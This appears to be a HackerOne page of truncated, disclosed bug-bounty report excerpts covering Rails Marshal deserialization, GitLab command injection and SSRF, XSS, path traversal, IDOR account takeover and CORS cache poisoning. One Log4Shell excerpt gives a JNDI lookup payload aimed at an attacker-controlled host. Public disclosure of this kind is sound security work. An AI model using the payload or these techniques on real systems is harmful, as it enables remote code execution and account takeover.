HackerOne Reports
Search through disclosed security reports
10,350 reports found
Showing 601 - 620
Since `ActiveSupport::MessageVerifier` and `ActiveSupport::MessageEncryptor` use Marshal as the default serializer, I confirmed that RCE is possible by object injection. ```ruby # https://github.com/rails/rails/blob/v5.2.2/activesupport/lib/active_support/message_verifier.rb#L110 def initialize(secret, options = {}) raise ArgumentError, "Secret should not be nil." unless secret @secret = secret @digest = options[:digest] || "SHA1" @serializer = options[:serializer] || Marshal end …
## Summary GitLab-Runner, when running on Windows with a `docker` executor, is vulnerable to Command Injection via the `DOCKER_AUTH_CONFIG` build variable. Injected commands are executed on the container host, not within a Docker container, as such could compromise all future builds which are executed by the runner. ## Details When …
Path Traversal on Default Installed Rails Application (Asset Pipeline)
Medium
$1,500
Closed
Description Summary: During the analysis of the curl source code, a possible vector for Cross-Site Scripting (XSS) was identified through the glob_url() function and how URL input is handled via urlnode->url. Improper input validation or escaping could result in untrusted data being processed insecurely. Affected version: Latest GitHub clone of …
Hi, This report is about Arbitrary Directory Listing vulnerability I found in serve module. Vulnerability does not allow to open arbitrary file due to ```send``` module which handles file reading and implements its own validation and protection against Path Traversal attacks. However ```serve``` handles directory listing on its own and …
The fix for CVE-2022-32212, covered the cases for routable IP addresses, however, there exists a specific behavior on macOS devices when handling the `http://0.0.0.0` URL that allows an attacker-controlled DNS server to bypass the DNS rebinding protection by resolving hosts in the `.local` domain. [Original HackerOne report](https://hackerone.com/reports/1632921) [Node.js Blog](https://nodejs.org/en/blog/vulnerability/september-2022-security-releases/#dns-rebinding-in-inspect-insufficient-fix-of-cve-2022-32212-affecting-macos-devices-high-cve-2022-32212-cve-2018-7160) ## …
A little bit about Rate Limit: A rate limiting algorithm is used to check if the user session (or IP-address) has to be limited based on the information in the session cache. In case a client made too many requests within a given timeframe, HTTP-Servers can respond with status code …
### Summary When importing a project via the BulkImports, the response field `httpUrlToRepo` from the client is used to fetch the repo: https://gitlab.com/gitlab-org/gitlab/-/blob/v15.3.1-ee/lib/bulk_imports/projects/pipelines/repository_pipeline.rb#L17 ```ruby def load(context, data) url = data['httpUrlToRepo'] return unless url.present? url = url.sub("://", "://oauth2:#{context.configuration.access_token}@") project = context.portable Gitlab::UrlBlocker.validate!(url, allow_local_network: allow_local_requests?, allow_localhost: allow_local_requests?) project.ensure_repository project.repository.fetch_as_mirror(url) end ``` `Gitlab::UrlBlocker.validate` …
I found a debug page with no access control that allows: - Uploading files. - Reading files if they are in JSON format. - Delete files. ## Impact - Insufficient access control. - An attacker can delete files exposed by the application. ## System Host(s) ████ ## Affected Product(s) and …
## Summary: (salam) Hi team i hope you are well , after doing some recon on ███████ i saw that the website use jolkia 1.3.5 it's vulnerable to reflected XSS ## Steps To Reproduce: 1. Vuln Link : ████: CVE-2018-1000129 Jolkia - Version ████████ ##POC █████████ ## Impact If an …
## Summary: Hello Team, https://mtnmobad.mtnbusiness.com.ng/app/updateUser allows authenticated users to alter their account profile. But, however, there is no authorization check when updating another user's profile thus, allowing attacker to modify anyone's profile info such as `Username, Address, Mobile Number, Company Name and Company Size` ## Steps To Reproduce: ## Requirements: …
## Summery: The `wp-json` implementation on some WordPress websites I've tested is vulnerable to Denial-of-service where by an attacker can provide an arbitrary origin header in the request, which is then echoed back in the response via the `Access-Control-Allow-Origin` header, which is cached and served to other requests. This response …
'/scauth/otp/droid/logout' request contains user_id parameter. Usually it is equal to current user user_id, but if an attacker passes user_id of victim account he can login as victim. I will demonstrate the problem on two accounts. Victim: ███ Attacker: ██████████ - Attacker perform a usuall login to attacker's personal account. - …
crayons :) ### Concrete5 Arbitrary File delete via PHAR deserialization - Target: Concrete5 - Version: 8.5.4 (Latest at 2020. 07. 12) / PHP 7.2 - Credit: [WSP Lab](https://wsp-lab.github.io/)@KAIST - Contact: [email protected] #### TL; DR - An attacker can send an arbitrary input value in the is_dir() function, which causes a …
**Description:** https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228 ## Impact Probably arbitrary code execution ## System Host(s) ████████ ## Affected Product(s) and Version(s) ## CVE Numbers CVE-2021-44228 ## Steps to Reproduce 1. Browse to https://████████/███████https%3A%2F%2F█████████%2F 2. Enter a `${jndi:ldap://dns-server-yoi-control/a}` into the username field 3. Enter a random password 4. Submit Observe that a request was made …
The Social App (https://apps.nextcloud.com/apps/social) lacks access controls in the `displayPost` function (`/@{username}/{token}`) allowing an unauthenticated user to view any message content by knowing or guessing the message ID. The vulnerable code is at https://github.com/nextcloud/social/blob/97fb063479d4c0ad6fccdea3774601a619f8a886/lib/Controller/ActivityPubController.php#L367. Note the TODO comment and the lack of authentication and authorization checks. The following is a …